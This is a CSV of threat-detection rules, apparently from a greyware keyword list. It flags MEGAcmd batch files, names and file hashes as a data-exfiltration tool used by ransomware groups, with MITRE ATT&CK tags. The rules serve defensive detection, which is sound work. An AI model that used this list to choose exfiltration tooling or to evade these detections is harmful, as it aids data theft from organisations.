"*\mega-killsession.bat*",".{0,1000}\\mega\-killsession\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\mega-lcd.bat*",".{0,1000}\\mega\-lcd\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\mega-log.bat*",".{0,1000}\\mega\-log\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\mega-login.bat*",".{0,1000}\\mega\-login\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - 
Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\mega-logout.bat*",".{0,1000}\\mega\-logout\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\mega-lpwd.bat*",".{0,1000}\\mega\-lpwd\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\mega-lpwd.bat*",".{0,1000}\\mega\-lpwd\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\mega-ls.bat*",".{0,1000}\\mega\-ls\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - 
TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\mega-mediainfo.bat*",".{0,1000}\\mega\-mediainfo\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\mega-mkdir.bat*",".{0,1000}\\mega\-mkdir\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\mega-mount.bat*",".{0,1000}\\mega\-mount\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" 
"*\mega-mv.bat*",".{0,1000}\\mega\-mv\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\mega-passwd.bat*",".{0,1000}\\mega\-passwd\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\mega-preview.bat*",".{0,1000}\\mega\-preview\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\mega-proxy.bat*",".{0,1000}\\mega\-proxy\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - 
Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\mega-put.bat*",".{0,1000}\\mega\-put\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\mega-pwd.bat*",".{0,1000}\\mega\-pwd\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\mega-pwd.bat*",".{0,1000}\\mega\-pwd\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\mega-quit.bat*",".{0,1000}\\mega\-quit\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira 
- Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\mega-reload.bat*",".{0,1000}\\mega\-reload\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\mega-rm.bat*",".{0,1000}\\mega\-rm\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\mega-session.bat*",".{0,1000}\\mega\-session\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\mega-share.bat*",".{0,1000}\\mega\-share\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line 
Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\mega-showpcr.bat*",".{0,1000}\\mega\-showpcr\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\mega-signup.bat*",".{0,1000}\\mega\-signup\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\mega-speedlimit.bat*",".{0,1000}\\mega\-speedlimit\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data 
Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\mega-sync.bat*",".{0,1000}\\mega\-sync\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\mega-thumbnail.bat*",".{0,1000}\\mega\-thumbnail\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\mega-transfers.bat*",".{0,1000}\\mega\-transfers\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\mega-tree.bat*",".{0,1000}\\mega\-tree\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - 
TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\mega-userattr.bat*",".{0,1000}\\mega\-userattr\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\mega-users.bat*",".{0,1000}\\mega\-users\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\mega-version.bat*",".{0,1000}\\mega\-version\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" 
"*\mega-webdav.bat*",".{0,1000}\\mega\-webdav\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\mega-whoami.bat*",".{0,1000}\\mega\-whoami\.bat.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*\Update MEGAcmd.lnk*",".{0,1000}\\Update\sMEGAcmd\.lnk.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","N/A","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*>MEGAcmd<*",".{0,1000}\>MEGAcmd\<.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data 
Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#productname","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*0302bf02c300acfcfcacc660b0bc9fb2077c1fdddc70d07196c72ffce08fe57a*",".{0,1000}0302bf02c300acfcfcacc660b0bc9fb2077c1fdddc70d07196c72ffce08fe57a.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*03d39664173b9baf2ae530b457510c4ee915e9060be46063511ed903d3afa265*",".{0,1000}03d39664173b9baf2ae530b457510c4ee915e9060be46063511ed903d3afa265.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*04fe985dcc18c3ab8dc4ecf5ebf61ed9dd4bafdcd0937c8d10235c98b2f4a9ae*",".{0,1000}04fe985dcc18c3ab8dc4ecf5ebf61ed9dd4bafdcd0937c8d10235c98b2f4a9ae.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data 
Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*05a360775b320890751946115dc6802fb3281817088c98696df97015abb5207a*",".{0,1000}05a360775b320890751946115dc6802fb3281817088c98696df97015abb5207a.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*071c731ba00d290f45bb8c1b53bb18f27ea8ac9780e9fa30e66cb071ae743778*",".{0,1000}071c731ba00d290f45bb8c1b53bb18f27ea8ac9780e9fa30e66cb071ae743778.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*074be5bde2acec1ea578d7c8e56463ff115851c9af70caeef002ae13c2cee1a3*",".{0,1000}074be5bde2acec1ea578d7c8e56463ff115851c9af70caeef002ae13c2cee1a3.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data 
Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*07f035eece5daa843a0b570b66d714e35f886e21a05446454743ed6e4729fc16*",".{0,1000}07f035eece5daa843a0b570b66d714e35f886e21a05446454743ed6e4729fc16.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*0809a44b710a9ff83ae4ab0358fa49881955184ca2d8823b2a1713d2a5d3f741*",".{0,1000}0809a44b710a9ff83ae4ab0358fa49881955184ca2d8823b2a1713d2a5d3f741.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*081bc7643ef925369e6a552549d998bdf92d15a9d0e1239a2502fadfe30dcd44*",".{0,1000}081bc7643ef925369e6a552549d998bdf92d15a9d0e1239a2502fadfe30dcd44.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data 
Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*0db350f810a9f99c15d47e7c8d5588443952e00c0a49f88a6ffa776250b03a08*",".{0,1000}0db350f810a9f99c15d47e7c8d5588443952e00c0a49f88a6ffa776250b03a08.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*0e683610f7369c674cebc1ecf8d6e030f0433226887b902e74fe1e174c23a6a7*",".{0,1000}0e683610f7369c674cebc1ecf8d6e030f0433226887b902e74fe1e174c23a6a7.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*0f5947f5dbd2543c49853451d6d0deb64b04796e4c61327a1b5aa1c295b2a861*",".{0,1000}0f5947f5dbd2543c49853451d6d0deb64b04796e4c61327a1b5aa1c295b2a861.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data 
Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*136759cb34240eab13e8251300ad1ebcf5e3d3f9c1f4fdd0ad01e71747f81431*",".{0,1000}136759cb34240eab13e8251300ad1ebcf5e3d3f9c1f4fdd0ad01e71747f81431.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data Exfiltration","https://github.com/meganz/MEGAcmd","1","0","#filehash","N/A","10","10","1914","406","2024-08-16T03:50:30Z","2017-08-28T16:58:54Z" "*1489daf3d466bd60c6b175e66bb567396b95e269bedaa42c4516392c49028f06*",".{0,1000}1489daf3d466bd60c6b175e66bb567396b95e269bedaa42c4516392c49028f06.{0,1000}","greyware_tool_keyword","MEGAcmd","Command Line Interactive and Scriptable Application to access MEGA (hosting service abused by attackers)","T1071 - T1041 - T1105","TA0010 - TA0009","N/A","Akira - Phobos - BlackCat - Karakurt - Scattered Spider* - LockBit - BianLian - Hive - Trigona - Quantum - INC Ransom - EvilCorp* - Avaddon","Data 